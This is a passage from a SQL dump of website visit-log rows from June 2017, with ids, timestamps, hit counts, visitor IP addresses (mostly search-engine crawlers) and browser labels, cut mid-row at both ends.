,0,0,'217.69.133.203','other'),(124376,1498101300,1,1,0,0,'164.132.161.43','other'),(124377,1498101595,1,1,0,0,'51.255.65.3','other'),(124378,1498101901,1,1,0,0,'66.249.76.131','chrome'),(124379,1498102092,1,1,0,0,'137.74.207.159','other'),(124380,1498102135,1,1,0,0,'8.29.198.25','other'),(124381,1498102452,10,10,0,0,'88.198.19.164','other'),(124382,1498102455,1,1,0,0,'217.69.133.194','other'),(124383,1498102707,1,1,0,0,'217.182.132.80','other'),(124384,1498102752,1,1,0,0,'5.255.253.54','other'),(124385,1498102979,1,1,0,0,'188.32.176.228','msie'),(124386,1498103135,1,1,0,0,'91.196.178.72','chrome'),(124387,1498103139,1,1,0,0,'164.132.161.23','other'),(124388,1498103428,1,1,0,0,'51.255.65.73','other'),(124389,1498103465,1,1,0,0,'151.80.27.118','other'),(124390,1498103684,2,2,0,0,'141.8.132.47','other'),(124391,1498103934,1,0,1,0,'66.249.76.137',''),(124392,1498104026,1,1,0,0,'37.204.66.49','msie'),(124393,1498104073,1,1,0,0,'216.244.66.237','other'),(124394,1498104397,3,3,0,0,'5.255.253.54','other'),(124395,1498104955,2,2,0,0,'141.8.142.152','other'),(124396,1498104973,1,1,0,0,'217.182.132.156','other'),(124397,1498105123,1,1,0,0,'217.182.132.84','other'),(124398,1498105236,1,1,0,0,'95.220.36.7','msie'),(124399,1498105307,3,3,0,0,'141.8.132.47','other'),(124400,1498105509,1,1,0,0,'51.255.65.65','other'),(124401,1498105522,1,1,0,0,'5.255.253.23','other'),(124402,1498105526,1,1,0,0,'141.8.142.142','other'),(124403,1498105612,1,1,0,0,'37.9.113.11','other'),(124404,1498105726,1,1,0,0,'95.220.198.249','msie'),(124405,1498105796,1,1,0,0,'93.158.152.14','other'),(124406,1498105839,1,1,0,0,'217.182.132.146','other'),(124407,1498106096,1,1,0,0,'164.132.161.57','other'),(124408,1498106156,1,1,0,0,'5.255.253.54','other'),(124409,1498106336,1,1,0,0,'141.8.132.49','other'),(124410,1498106386,1,1,0,0,'91.196.178.67','firefox'),(124411,1498106445,1,1,0,0,'141.8.142.152','other'),(124412,1498106465,1,1,0,0,'217.69.133.4','other'),(124413,1498106522,3,3,0,0,'178.154.200.42','other'),(124414,1498106573,1,1,0,0,'164.132.161.48','other'),(124415,1498106674,1,1,0,0,'141.8.142.134','other'),(124416,1498106686,1,1,0,0,'164.132.161.73','other'),(124417,1498106771,1,1,0,0,'51.255.71.123','other'),(124418,1498106793,1,0,1,0,'66.249.76.114',''),(124419,1498106799,1,0,1,0,'66.249.66.157',''),(124420,1498106875,2,2,0,0,'141.8.132.47','other'),(124421,1498106901,1,1,0,0,'95.108.213.25','other'),(124422,1498106947,1,1,0,0,'178.154.200.67','other'),(124423,1498106978,1,1,0,0,'164.132.161.67','other'),(124424,1498106997,1,1,0,0,'141.8.142.142','other'),(124425,1498107043,2,2,0,0,'37.9.113.11','other'),(124426,1498107082,1,1,0,0,'46.188.106.212','msie'),(124427,1498107141,1,1,0,0,'5.255.253.54','other'),(124428,1498107232,1,1,0,0,'91.196.177.44','chrome'),(124429,1498107282,1,1,0,0,'216.244.66.237','other'),(124430,1498107650,1,1,0,0,'164.132.161.29','other'),(124431,1498107972,1,1,0,0,'37.9.113.11','other'),(124432,1498108165,1,1,0,0,'164.132.161.93','other'),(124433,1498108521,1,1,0,0,'54.165.59.7','other'),(124434,1498108755,1,1,0,0,'180.76.15.149','other'),(124435,1498109407,1,1,0,0,'178.92.138.84','chrome'),(124436,1498109960,1,0,1,0,'66.249.76.137',''),(124437,1498110160,1,1,0,0,'51.255.65.33','other'),(124438,1498110563,1,1,0,0,'141.8.142.152','other'),(124439,1498110581,1,1,0,0,'217.182.132.55','other'),(124440,1498110873,1,1,0,0,'217.182.132.72','other'),(124441,1498111084,1,1,0,0,'217.69.133.203','other'),(124442,1498111213,1,1,0,0,'217.182.132.63','other'),(124443,1498111628,1,1,0,0,'51.255.71.130','other'),(124444,1498111672,1,1,0,0,'217.182.132.15','other'),(124445,1498112081,1,1,0,0,'157.55.39.183','other'),(124446,1498112613,1,1,0,0,'91.196.178.71','chrome'),(124447,1498112809,1,1,0,0,'94.180.129.140','msie'),(124448,1498112973,1,1,0,0,'8.29.198.27','other'),(124449,1498113031,1,1,0,0,'137.74.207.102','other'),(124450,1498113034,1,1,0,0,'80.254.155.43','chrome'),(124451,1498113090,1,1,0,0,'51.255.65.59','other'),(124452,1498113381,1,1,0,0,'130.180.217.150','firefox'),(124453,1498113555,1,1,0,0,'37.204.66.49','msie'),(124454,1498113843,1,1,0,0,'164.132.161.93','other'),(124455,1498114006,1,0,1,0,'66.249.76.112',''),(124456,1498114562,1,1,0,0,'95.220.36.7','msie'),(124457,1498114846,1,1,0,0,'157.55.39.160','other'),(124458,1498115185,1,1,0,0,'217.182.132.57','other'),(124459,1498115240,1,1,0,0,'91.196.178.71','chrome'),(124460,1498115399,1,1,0,0,'109.63.237.35','msie'),(124461,1498116009,1,1,0,0,'51.255.65.93','other'),(124462,1498116057,1,1,0,0,'66.249.76.131','chrome'),(124463,1498116235,1,1,0,0,'66.249.76.112','chrome'),(124464,1498116483,1,1,0,0,'164.132.161.67','other'),(124465,1498117589,1,1,0,0,'157.55.39.160','other'),(124466,1498117704,1,1,0,0,'157.55.39.222','other'),(124467,1498117778,2,2,0,0,'217.182.132.55','other'),(124468,1498118158,1,1,0,0,'217.182.132.6','other'),(124469,1498118187,1,1,0,0,'164.132.161.14','other'),(124470,1498118387,1,1,0,0,'217.182.132.85','other'),(124471,1498118458,1,1,0,0,'164.132.161.88','other'),(124472,1498118462,1,1,0,0,'164.132.161.44','other'),(124473,1498118574,1,1,0,0,'91.196.178.161','chrome'),(124474,1498119168,1,1,0,0,'91.196.178.68','chrome'),(124475,1498119698,1,1,0,0,'51.255.65.58','other'),(124476,1498120002,1,1,0,0,'91.196.178.161','chrome'),(124477,1498120111,1,1,0,0,'51.255.65.70','other'),(124478,1498120295,1,1,0,0,'137.74.207.108','other'),(124479,1498120421,1,1,0,0,'51.255.65.54','other'),(124480,1498120881,1,1,0,0,'164.132.161.90','other'),(124481,1498121065,1,1,0,0,'91.196.178.68','firefox'),(124482,1498121825,1,1,0,0,'91.196.178.134','chrome'),(124483,1498122016,1,1,0,0,'51.255.65.33','other'),(124484,1498122246,1,1,0,0,'91.196.178.72','firefox'),(124485,1498122294,1,1,0,0,'217.182.132.68','other'),(124486,1498123507,1,1,0,0,'178.95.247.243','firefox'),(124487,1498123799,1,1,0,0,'164.132.161.68','other'),(124488,1498123804,1,1,0,0,'8.29.198.25','other'),(124489,1498124040,1,1,0,0,'51.255.71.101','other'),(124490,1498124085,1,1,0,0,'164.132.161.60','other'),(124491,1498124323,1,1,0,0,'217.182.132.67','other'),(124492,1498124557,1,1,0,0,'217.182.132.37','other'),(124493,1498124740,1,1,0,0,'91.196.178.68','chrome'),(124494,1498124777,1,0,1,0,'66.249.66.157',''),(124495,1498125046,1,1,0,0,'217.182.132.51','other'),(124496,1498125256,2,2,0,0,'178.154.200.42','other'),(124497,1498125423,8,8,0,0,'5.255.253.54','other'),(124498,1498125454,1,1,0,0,'141.8.142.134','other'),(124499,1498125455,10,10,0,0,'88.198.54.49','other'),(124500,1498125772,1,1,0,0,'164.132.161.38','other'),(124501,1498125805,1,1,0,0,'46.165.197.142','other'),(124502,1498126170,1,1,0,0,'157.55.39.160','other'),(124503,1498126207,5,5,0,0,'178.154.200.42','other'),(124504,1498126411,2,2,0,0,'5.255.253.54','other'),(124505,1498126501,1,1,0,0,'141.8.132.47','other'),(124506,1498126523,2,2,0,0,'88.198.66.230','other'),(124507,1498126535,1,1,0,0,'37.9.113.11','other'),(124508,1498126640,2,2,0,0,'141.8.142.152','other'),(124509,1498126674,1,1,0,0,'141.8.142.134','other'),(124510,1498127081,1,1,0,0,'217.182.132.65','other'),(124511,1498127264,1,1,0,0,'54.165.59.7','other'),(124512,1498127515,1,1,0,0,'217.182.132.146','other'),(124513,1498127685,1,1,0,0,'91.209.11.236','other'),(124514,1498127747,1,1,0,0,'51.255.65.57','other'),(124515,1498127775,1,1,0,0,'5.255.253.23','other'),(124516,1498127909,1,1,0,0,'66.249.66.74','chrome'),(124517,1498127976,2,2,0,0,'178.154.200.42','other'),(124518,1498128576,1,1,0,0,'51.255.65.73','other'),(124519,1498128593,1,1,0,0,'91.209.11.236','other'),(124520,1498128633,1,1,0,0,'51.255.65.65','other'),(124521,1498129046,1,1,0,0,'5.255.253.27','other'),(124522,1498129112,1,1,0,0,'163.172.108.151','chrome'),(124523,1498129380,1,1,0,0,'217.182.132.52','other'),(124524,1498129518,1,1,0,0,'91.196.178.71','other'),(124525,1498129723,1,1,0,0,'40.77.167.42','other'),(124526,1498129726,1,1,0,0,'66.102.9.134','chrome'),(124527,1498129831,2,2,0,0,'178.154.200.42','other'),(124528,1498129897,1,1,0,0,'5.255.253.23','other'),(124529,1498129936,1,1,0,0,'141.8.132.47','other'),(124530,1498129939,1,1,0,0,'141.8.132.49','other'),(124531,1498129998,1,1,0,0,'46.242.121.59','chrome'),(124532,1498130116,1,1,0,0,'141.8.142.152','other'),(124533,1498130162,1,1,0,0,'217.182.132.171','other'),(124534,1498130256,1,1,0,0,'164.132.162.160','other'),(124535,1498130460,1,1,0,0,'94.178.96.185','chrome'),(124536,1498130577,1,1,0,0,'5.255.253.54','other'),(124537,1498130627,1,1,0,0,'91.196.178.72','firefox'),(124538,1498130885,1,1,0,0,'164.132.161.91','other'),(124539,1498131261,1,1,0,0,'66.102.9.155','chrome'),(124540,1498131394,1,1,0,0,'51.255.65.34','other'),(124541,1498131426,1,1,0,0,'141.8.142.152','other'),(124542,1498131429,1,1,0,0,'217.182.132.87','other'),(124543,1498131490,1,1,0,0,'141.8.132.47','other'),(124544,1498131531,1,1,0,0,'164.132.161.24','other'),(124545,1498131544,1,1,0,0,'5.255.253.54','other'),(124546,1498131590,1,1,0,0,'178.154.200.42','other'),(124547,1498131748,1,1,0,0,'95.108.213.25','other'),(124548,1498131751,1,1,0,0,'93.158.152.14','other'),(124549,1498132172,1,1,0,0,'77.52.187.154','firefox'),(124550,1498132245,1,1,0,0,'178.154.200.67','other'),(124551,1498132405,1,1,0,0,'217.182.132.78','other'),(124552,1498132663,1,1,0,0,'51.255.64.106','other'),(124553,1498132784,1,1,0,0,'164.132.161.19','other'),(124554,1498133063,1,1,0,0,'94.254.241.161','chrome'),(124555,1498133348,1,1,0,0,'51.255.65.65','other'),(124556,1498133410,1,1,0,0,'137.74.207.102','other'),(124557,1498133641,1,1,0,0,'164.132.161.7','other'),(124558,1498133845,1,1,0,0,'217.182.132.188','other'),(124559,1498133917,1,1,0,0,'164.132.161.17','other'),(124560,1498133970,1,1,0,0,'178.95.247.243','firefox'),(124561,1498133984,1,1,0,0,'51.255.65.76','other'),(124562,1498134138,1,1,0,0,'91.196.178.68','chrome'),(124563,1498134197,1,0,1,0,'66.249.76.131',''),(124564,1498134245,1,1,0,0,'217.182.132.30','other'),(124565,1498134309,1,1,0,0,'195.16.79.195','chrome'),(124566,1498134340,1,1,0,0,'5.58.40.76','chrome'),(124567,1498134604,1,1,0,0,'188.32.176.228','msie'),(124568,1498134628,1,1,0,0,'8.29.198.27','other'),(124569,1498135033,1,1,0,0,'217.182.132.95','other'),(124570,1498135318,1,1,0,0,'91.209.11.236','other'),(124571,1498135526,1,1,0,0,'176.15.236.70','msie'),(124572,1498135577,1,1,0,0,'180.76.15.155','other'),(124573,1498135787,1,0,1,0,'66.249.76.131',''),(124574,1498135969,1,1,0,0,'164.132.161.77','other'),(124575,1498136053,1,1,0,0,'51.255.65.32','other'),(124576,1498136302,1,1,0,0,'176.14.212.86','chrome'),(124577,1498136384,1,1,0,0,'5.228.35.210','msie'),(124578,1498136608,1,1,0,0,'5.255.253.16','other'),(124579,1498136649,2,2,0,0,'141.8.142.39','other'),(124580,1498136703,1,1,0,0,'95.220.198.249','msie'),(124581,1498136718,1,1,0,0,'217.182.132.176','other'),(124582,1498137035,1,1,0,0,'137.74.203.194','other'),(124583,1498137107,1,1,0,0,'141.8.132.37','other'),(124584,1498137226,1,1,0,0,'95.108.179.17','other'),(124585,1498137339,1,1,0,0,'178.154.200.67','other'),(124586,1498137412,1,1,0,0,'207.46.13.50','other'),(124587,1498137579,2,2,0,0,'89.185.0.107','chrome'),(124588,1498137645,1,1,0,0,'87.250.224.19','other'),(124589,1498137745,2,2,0,0,'5.255.253.16','other'),(124590,1498137796,1,1,0,0,'91.196.178.134','firefox'),(124591,1498137823,1,1,0,0,'164.132.162.157','other'),(124592,1498137906,2,2,0,0,'95.108.213.25','other'),(124593,1498138046,1,1,0,0,'87.250.224.26','other'),(124594,1498138377,1,1,0,0,'141.8.142.134','other'),(124595,1498138485,1,1,0,0,'141.8.142.152','other'),(124596,1498138630,1,1,0,0,'141.8.142.70','other'),(124597,1498138780,1,1,0,0,'164.132.161.53','other'),(124598,1498138869,1,1,0,0,'217.182.132.60','other'),(124599,1498138948,2,2,0,0,'37.9.113.11','other'),(124600,1498139038,1,1,0,0,'141.8.142.50','other'),(124601,1498139222,1,1,0,0,'141.8.132.49','other'),(124602,1498139321,1,1,0,0,'91.196.178.68','chrome'),(124603,1498139331,1,1,0,0,'178.95.247.243','firefox'),(124604,1498139354,1,1,0,0,'5.255.253.54','other'),(124605,1498139556,2,2,0,0,'95.108.181.27','other'),(124606,1498139558,2,2,0,0,'141.8.142.142','other'),(124607,1498139611,1,1,0,0,'5.255.253.23','other'),(124608,1498139623,1,1,0,0,'51.255.65.3','other'),(124609,1498139664,1,1,0,0,'5.255.253.66','other'),(124610,1498139777,1,1,0,0,'207.46.13.50','other'),(124611,1498139838,1,1,0,0,'217.69.133.203','other'),(124612,1498139962,1,1,0,0,'178.154.200.42','other'),(124613,1498140107,1,1,0,0,'95.108.179.17','other'),(124614,1498140293,1,1,0,0,'141.8.132.37','other'),(124615,1498140321,2,2,0,0,'141.8.142.134','other'),(124616,1498140354,1,1,0,0,'93.158.152.14','other'),(124617,1498140382,1,1,0,0,'5.255.253.54','other'),(124618,1498140448,1,1,0,0,'37.9.113.11','other'),(124619,1498140459,1,1,0,0,'51.255.71.128','other'),(124620,1498140837,1,1,0,0,'37.55.1.32','firefox'),(124621,1498140956,1,0,1,0,'68.180.230.48',''),(124622,1498141054,1,1,0,0,'217.69.133.9','other'),(124623,1498141056,1,1,0,0,'94.179.5.63','other'),(124624,1498141978,1,1,0,0,'51.255.65.60','other'),(124625,1498142039,1,1,0,0,'164.132.161.33','other'),(124626,1498142040,1,1,0,0,'91.227.150.26','chrome'),(124627,1498142212,1,1,0,0,'164.132.161.67','other'),(124628,1498142253,1,1,0,0,'51.255.65.46','other'),(124629,1498142390,1,1,0,0,'51.255.71.101','other'),(124630,1498142509,2,2,0,0,'91.209.11.236','other'),(124631,1498142615,1,1,0,0,'51.255.65.5','other'),(124632,1498142733,1,1,0,0,'51.255.65.18','other'),(124633,1498142823,6,6,0,0,'5.9.147.133','other'),(124634,1498142933,1,1,0,0,'188.32.176.228','msie'),(124635,1498143101,1,1,0,0,'164.132.161.84','other'),(124636,1498143635,1,1,0,0,'37.204.66.49','msie'),(124637,1498144017,1,1,0,0,'91.209.11.236','other'),(124638,1498144270,1,1,0,0,'51.255.65.51','other'),(124639,1498144818,1,1,0,0,'95.220.36.7','msie'),(124640,1498144873,1,1,0,0,'217.182.132.28','other'),(124641,1498144898,1,1,0,0,'109.63.237.35','msie'),(124642,1498145220,1,0,1,0,'68.180.230.48',''),(124643,1498145458,1,1,0,0,'8.29.198.25','other'),(124644,1498145878,1,1,0,0,'195.69.221.54','chrome'),(124645,1498145953,1,1,0,0,'40.77.167.42','other'),(124646,1498146018,1,1,0,0,'217.182.132.154','other'),(124647,1498146306,2,2,0,0,'217.182.132.75','other'),(124648,1498146485,1,1,0,0,'51.255.65.3','other'),(124649,1498146763,1,1,0,0,'217.69.133.5','other'),(124650,1498147137,1,1,0,0,'217.182.132.177','other'),(124651,1498147148,1,1,0,0,'164.132.162.156','other'),(124652,1498147648,1,1,0,0,'51.255.65.57','other'),(124653,1498147833,1,1,0,0,'54.165.59.7','other'),(124654,1498147968,1,1,0,0,'51.255.65.44','other'),(124655,1498148254,1,1,0,0,'217.69.133.6','other'),(124656,1498148541,1,1,0,0,'91.196.178.34','chrome'),(124657,1498149332,1,1,0,0,'51.255.71.129','other'),(124658,1498149386,1,1,0,0,'176.15.30.94','chrome'),(124659,1498149680,2,0,2,0,'66.249.64.28',''),(124660,1498149729,1,1,0,0,'54.165.59.7','other'),(124661,1498150161,1,1,0,0,'157.55.39.160','other'),(124662,1498150355,1,1,0,0,'164.132.161.81','other'),(124663,1498150419,1,1,0,0,'217.182.132.147','other'),(124664,1498151237,1,1,0,0,'217.69.133.194','other'),(124665,1498151242,1,0,1,0,'66.249.64.28',''),(124666,1498151407,1,0,1,0,'66.249.64.153',''),(124667,1498151747,1,1,0,0,'54.165.59.7','other'),(124668,1498151854,1,1,0,0,'217.182.132.68','other'),(124669,1498151856,1,1,0,0,'217.182.132.61','other'),(124670,1498151868,1,1,0,0,'94.180.129.140','msie'),(124671,1498152064,1,1,0,0,'51.255.65.2','other'),(124672,1498152125,1,1,0,0,'141.8.142.142','other'),(124673,1498152227,1,1,0,0,'178.154.200.67','other'),(124674,1498152367,1,1,0,0,'93.158.152.14','other'),(124675,1498152404,1,1,0,0,'178.154.200.27','other'),(124676,1498152406,3,3,0,0,'141.8.132.37','other'),(124677,1498152422,1,1,0,0,'217.182.132.69','other'),(124678,1498152507,1,1,0,0,'95.108.179.12','other'),(124679,1498152622,1,1,0,0,'207.46.13.51','other'),(124680,1498152665,1,1,0,0,'141.8.142.152','other'),(124681,1498152710,1,1,0,0,'163.172.108.151','chrome'),(124682,1498152712,1,0,1,0,'66.249.64.30',''),(124683,1498152744,2,2,0,0,'178.154.200.42','other'),(124684,1498152832,1,1,0,0,'178.154.189.10','other'),(124685,1498152879,2,2,0,0,'5.255.253.16','other'),(124686,1498152923,1,1,0,0,'5.228.100.210','msie'),(124687,1498153220,1,1,0,0,'217.182.132.175','other'),(124688,1498153300,1,0,1,0,'66.249.64.29',''),(124689,1498153385,1,1,0,0,'95.220.36.7','msie'),(124690,1498153408,1,1,0,0,'185.156.173.52','chrome'),(124691,1498153475,1,1,0,0,'5.255.253.54','other'),(124692,1498153692,1,1,0,0,'217.182.132.86','other'),(124693,1498154158,1,1,0,0,'95.220.198.249','msie'),(124694,1498154498,1,1,0,0,'54.165.59.7','other'),(124695,1498154759,1,1,0,0,'51.255.71.114','other'),(124696,1498154828,1,1,0,0,'180.76.15.12','other'),(124697,1498155177,1,1,0,0,'51.255.65.34','other'),(124698,1498155399,1,1,0,0,'217.182.132.188','other'),(124699,1498155776,1,1,0,0,'51.255.65.29','other'),(124700,1498156044,1,1,0,0,'51.255.65.94','other'),(124701,1498156115,1,1,0,0,'217.182.132.147','other'),(124702,1498156281,1,1,0,0,'8.29.198.27','other'),(124703,1498156596,1,1,0,0,'51.255.71.117','other'),(124704,1498157059,1,1,0,0,'217.182.132.69','other'),(124705,1498157165,1,1,0,0,'164.132.161.65','other'),(124706,1498157831,1,1,0,0,'51.255.65.83','other'),(124707,1498157881,1,1,0,0,'40.77.167.42','other'),(124708,1498159467,1,1,0,0,'164.132.161.82','other'),(124709,1498159536,1,0,1,0,'66.249.64.29',''),(124710,1498160059,1,1,0,0,'217.182.132.156','other'),(124711,1498160072,2,2,0,0,'157.55.39.222','other'),(124712,1498160479,1,1,0,0,'188.32.176.228','msie'),(124713,1498161034,1,1,0,0,'130.180.219.183','chrome'),(124714,1498161253,1,1,0,0,'164.132.164.180','other'),(124715,1498161513,1,1,0,0,'109.63.183.134','msie'),(124716,1498161887,1,1,0,0,'144.76.8.231','other'),(124717,1498162289,1,0,1,0,'68.180.230.48',''),(124718,1498162351,1,1,0,0,'51.255.71.114','other'),(124719,1498162447,1,1,0,0,'141.8.142.134','other'),(124720,1498162615,1,1,0,0,'95.220.36.7','msie'),(124721,1498162672,1,1,0,0,'176.193.124.128','msie'),(124722,1498163094,1,1,0,0,'91.196.178.167','chrome'),(124723,1498163874,1,1,0,0,'37.73.233.252','chrome'),(124724,1498163909,1,1,0,0,'217.182.132.31','other'),(124725,1498164043,1,1,0,0,'164.132.161.24','other'),(124726,1498164191,1,1,0,0,'92.112.124.19','chrome'),(124727,1498164263,1,0,1,0,'66.249.64.155',''),(124728,1498164309,1,1,0,0,'178.154.200.42','other'),(124729,1498165253,2,2,0,0,'91.196.178.132','chrome'),(124730,1498165477,1,1,0,0,'51.255.65.92','other'),(124731,1498165836,5,5,0,0,'178.154.200.42','other'),(124732,1498165867,1,1,0,0,'217.182.132.31','other'),(124733,1498166094,3,3,0,0,'141.8.132.47','other'),(124734,1498166364,2,2,0,0,'54.165.59.7','other'),(124735,1498166424,1,1,0,0,'51.255.65.64','other'),(124736,1498166530,1,1,0,0,'5.255.253.54','other'),(124737,1498166554,2,2,0,0,'37.9.113.11','other'),(124738,1498166749,1,1,0,0,'141.8.142.152','other'),(124739,1498166854,1,1,0,0,'141.8.132.49','other'),(124740,1498166921,1,1,0,0,'164.132.161.45','other'),(124741,1498166933,1,1,0,0,'141.8.142.129','other'),(124742,1498167075,1,1,0,0,'5.255.253.27','other'),(124743,1498167110,1,1,0,0,'8.29.198.25','other'),(124744,1498167147,1,1,0,0,'217.182.132.87','other'),(124745,1498167229,1,1,0,0,'178.154.200.42','other'),(124746,1498167233,1,1,0,0,'178.154.149.7','other'),(124747,1498167316,1,1,0,0,'178.154.200.27','other'),(124748,1498167383,1,1,0,0,'164.132.161.61','other'),(124749,1498167386,1,1,0,0,'141.8.142.70','other'),(124750,1498167453,1,1,0,0,'5.255.253.45','other'),(124751,1498167503,1,1,0,0,'5.255.253.66','other'),(124752,1498167591,1,1,0,0,'95.108.213.25','other'),(124753,1498167658,1,1,0,0,'178.154.200.12','other'),(124754,1498167709,3,3,0,0,'141.8.132.47','other'),(124755,1498167842,1,1,0,0,'5.255.253.54','other'),(124756,1498167855,2,0,2,0,'66.249.64.30',''),(124757,1498167905,1,1,0,0,'141.8.132.49','other'),(124758,1498168081,2,0,2,0,'66.249.64.29',''),(124759,1498168305,2,2,0,0,'91.209.11.236','other'),(124760,1498169409,1,1,0,0,'91.209.11.236','other'),(124761,1498169582,2,2,0,0,'141.8.142.152','other'),(124762,1498169776,1,1,0,0,'5.255.253.23','other'),(124763,1498169815,1,1,0,0,'5.255.253.54','other'),(124764,1498169879,1,1,0,0,'217.182.132.93','other'),(124765,1498171168,1,1,0,0,'217.182.132.25','other'),(124766,1498171295,1,1,0,0,'164.132.161.32','other'),(124767,1498171308,1,1,0,0,'217.182.132.82','other'),(124768,1498171357,1,1,0,0,'51.255.65.50','other'),(124769,1498171435,2,2,0,0,'91.209.11.236','other'),(124770,1498171532,1,1,0,0,'217.182.132.4','other'),(124771,1498171864,1,1,0,0,'137.74.207.116','other'),(124772,1498172330,2,0,2,0,'66.249.64.157',''),(124773,1498172729,1,0,1,0,'66.249.64.155',''),(124774,1498172883,1,1,0,0,'164.132.161.2','other'),(124775,1498173008,1,1,0,0,'207.46.13.51','other'),(124776,1498173427,1,0,1,0,'66.249.64.153',''),(124777,1498173480,1,1,0,0,'164.132.161.46','other'),(124778,1498173550,1,1,0,0,'217.182.132.16','other'),(124779,1498173914,4,4,0,0,'91.209.11.236','other'),(124780,1498174224,1,1,0,0,'66.249.64.155','chrome'),(124781,1498174422,1,0,1,0,'66.249.64.157',''),(124782,1498174862,1,1,0,0,'51.255.65.31','other'),(124783,1498175202,1,1,0,0,'216.244.66.237','other'),(124784,1498175272,1,0,1,0,'66.249.64.30',''),(124785,1498175665,1,1,0,0,'66.249.64.155','chrome'),(124786,1498175838,1,1,0,0,'66.249.64.153','chrome'),(124787,1498175907,1,1,0,0,'164.132.161.20','other'),(124788,1498175983,1,1,0,0,'178.154.200.42','other'),(124789,1498176097,2,2,0,0,'5.255.253.54','other'),(124790,1498176105,1,1,0,0,'164.132.161.80','other'),(124791,1498176110,1,1,0,0,'217.182.132.77','other'),(124792,1498176175,1,1,0,0,'141.8.142.134','other'),(124793,1498176248,1,1,0,0,'40.77.167.42','other'),(124794,1498176295,1,1,0,0,'137.74.207.119','other'),(124795,1498176453,1,1,0,0,'87.250.224.19','other'),(124796,1498176758,2,2,0,0,'37.9.113.11','other'),(124797,1498176845,3,3,0,0,'141.8.142.152','other'),(124798,1498176858,1,1,0,0,'217.69.133.9','other'),(124799,1498176941,1,0,1,0,'66.249.64.153',''),(124800,1498176967,1,1,0,0,'66.249.64.155','chrome'),(124801,1498176992,2,2,0,0,'66.249.64.153','chrome'),(124802,1498177092,1,0,1,0,'66.249.64.30',''),(124803,1498177277,2,2,0,0,'178.154.200.42','other'),(124804,1498177442,2,2,0,0,'91.209.11.236','other'),(124805,1498177482,1,1,0,0,'5.255.253.34','other'),(124806,1498177540,1,1,0,0,'51.255.65.30','other'),(124807,1498177812,1,0,1,0,'66.249.64.157',''),(124808,1498177831,1,1,0,0,'141.8.132.47','other'),(124809,1498177934,1,1,0,0,'8.29.198.26','other'),(124810,1498178153,3,3,0,0,'141.8.142.152','other'),(124811,1498178191,1,1,0,0,'51.255.65.31','other'),(124812,1498178196,1,1,0,0,'51.255.65.92','other'),(124813,1498178342,2,2,0,0,'5.255.253.54','other'),(124814,1498178567,1,1,0,0,'164.132.161.59','other'),(124815,1498178595,1,1,0,0,'180.76.15.151','other'),(124816,1498178797,2,1,1,0,'66.249.64.29',''),(124817,1498178928,1,1,0,0,'51.255.65.77','other'),(124818,1498178940,1,1,0,0,'66.249.64.28','chrome'),(124819,1498179230,1,1,0,0,'178.154.200.42','other'),(124820,1498179307,2,2,0,0,'141.8.132.47','other'),(124821,1498179460,3,3,0,0,'5.255.253.54','other'),(124822,1498179696,1,1,0,0,'141.8.142.134','other'),(124823,1498179776,2,0,2,0,'66.249.64.153',''),(124824,1498180270,1,1,0,0,'51.255.65.6','other'),(124825,1498180331,1,1,0,0,'164.132.161.75','other'),(124826,1498180635,1,0,1,0,'66.249.64.155',''),(124827,1498181099,1,1,0,0,'51.255.65.93','other'),(124828,1498181278,1,1,0,0,'93.158.152.29','other'),(124829,1498181281,1,1,0,0,'141.8.142.148','other'),(124830,1498181514,1,1,0,0,'141.8.142.72','other'),(124831,1498181592,1,1,0,0,'141.8.132.64','other'),(124832,1498181771,1,1,0,0,'216.244.66.237','other'),(124833,1498182854,1,1,0,0,'217.182.132.192','other'),(124834,1498182965,1,1,0,0,'217.182.132.33','other'),(124835,1498183028,1,1,0,0,'217.182.132.25','other'),(124836,1498183166,1,0,1,0,'66.249.64.153',''),(124837,1498183214,1,1,0,0,'141.8.142.148','other'),(124838,1498183315,1,0,1,0,'66.249.64.155',''),(124839,1498183455,2,1,1,0,'66.249.64.153',''),(124840,1498183811,1,1,0,0,'217.182.132.79','other'),(124841,1498184272,1,1,0,0,'217.182.132.72','other'),(124842,1498184274,1,1,0,0,'164.132.161.65','other'),(124843,1498184764,2,0,2,0,'66.249.64.153',''),(124844,1498184921,1,1,0,0,'51.255.65.26','other'),(124845,1498185139,1,1,0,0,'185.156.173.226','chrome'),(124846,1498185417,1,1,0,0,'217.182.132.151','other'),(124847,1498185984,1,1,0,0,'216.244.66.237','other'),(124848,1498187088,1,1,0,0,'46.161.9.55','chrome'),(124849,1498187187,1,0,1,0,'66.249.64.157',''),(124850,1498187265,1,1,0,0,'217.182.132.16','other'),(124851,1498187334,1,1,0,0,'217.182.132.84','other'),(124852,1498187540,1,1,0,0,'180.76.15.147','other'),(124853,1498187607,1,1,0,0,'51.255.65.4','other'),(124854,1498188361,1,1,0,0,'87.250.224.26','other'),(124855,1498188363,1,1,0,0,'141.8.142.70','other'),(124856,1498188386,1,1,0,0,'51.255.65.72','other'),(124857,1498188419,1,1,0,0,'141.8.132.1','other'),(124858,1498188422,1,1,0,0,'141.8.142.151','other'),(124859,1498188462,2,2,0,0,'93.158.152.43','other'),(124860,1498188527,1,1,0,0,'164.132.161.69','other'),(124861,1498188611,1,0,1,0,'66.249.64.157',''),(124862,1498188732,2,2,0,0,'93.158.152.45','other'),(124863,1498188768,1,1,0,0,'8.29.198.26','other'),(124864,1498188780,1,1,0,0,'37.9.113.15','other'),(124865,1498188795,1,0,1,0,'66.249.64.155',''),(124866,1498188955,1,1,0,0,'217.182.132.182','other'),(124867,1498189004,1,1,0,0,'51.255.71.119','other'),(124868,1498189080,2,2,0,0,'91.209.11.236','other'),(124869,1498189196,1,1,0,0,'217.182.132.52','other'),(124870,1498189357,1,1,0,0,'51.255.65.2','other'),(124871,1498189946,2,2,0,0,'95.108.213.3','other'),(124872,1498190036,4,4,0,0,'37.9.113.16','other'),(124873,1498190038,1,1,0,0,'5.255.253.66','other'),(124874,1498190413,1,1,0,0,'141.8.132.1','other'),(124875,1498190591,1,1,0,0,'87.250.224.21','other'),(124876,1498190654,1,1,0,0,'95.108.181.22','other'),(124877,1498191182,1,1,0,0,'93.158.152.45','other'),(124878,1498191244,1,1,0,0,'217.69.133.9','other'),(124879,1498191434,1,1,0,0,'164.132.161.73','other'),(124880,1498191466,1,1,0,0,'66.249.64.135','chrome'),(124881,1498191622,1,1,0,0,'51.255.65.3','other'),(124882,1498191685,1,1,0,0,'5.9.89.170','other'),(124883,1498192023,1,1,0,0,'178.154.200.12','other'),(124884,1498192035,1,0,1,0,'66.249.64.28',''),(124885,1498192177,1,1,0,0,'5.255.253.33','other'),(124886,1498192272,1,1,0,0,'217.182.132.75','other'),(124887,1498192383,1,0,1,0,'66.249.64.30',''),(124888,1498192411,1,1,0,0,'51.255.65.224','other'),(124889,1